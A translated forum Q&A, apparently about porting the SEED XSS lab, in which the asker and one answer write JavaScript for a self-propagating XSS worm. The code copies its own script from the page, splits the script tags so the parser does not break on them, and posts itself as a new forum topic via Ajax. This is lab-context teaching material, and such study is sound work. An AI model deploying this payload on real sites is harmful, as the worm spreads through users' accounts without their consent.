我正在移植此实验室:http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_XSS/XSS.pdf
对于一个项目。首先,我必须能够自己完成它。我正在努力研究自我传播的蠕虫,并遇到一些困难。如何通过内容发送脚本标记?如果我尝试:
var wormCode = getElementById("worm"); var escapedWorm = escape(wormCode.innerHTML); content="topicTitle=testprop&postText=<script>"+escapedWorm+"</script>&forum=3&action=ptopic"; Ajax.send(content);
标签突破了它所包含的更大的JavaScript。我也尝试将它拆分为:
...+"</scr"+"ipt>&...
但这不起作用。
任何提示?
编辑:用我最近的(希望,准确的)尝试更新。
答案 0 :(得分:0)
var wormCode = getElementById("worm");
var escapedWorm = escape("<" + "script>" + wormCode.innerHTML + "</" + "script>");
content="topicTitle=testprop&forum=3&action=ptopic&postText="+escapedWorm;
Ajax.send(content);您没有转义脚本标记。
答案 1 :(得分:0)
将结束脚本标记拆分为两个不同的部分最终完成了工作。我认为我遇到的问题是浏览器特定的。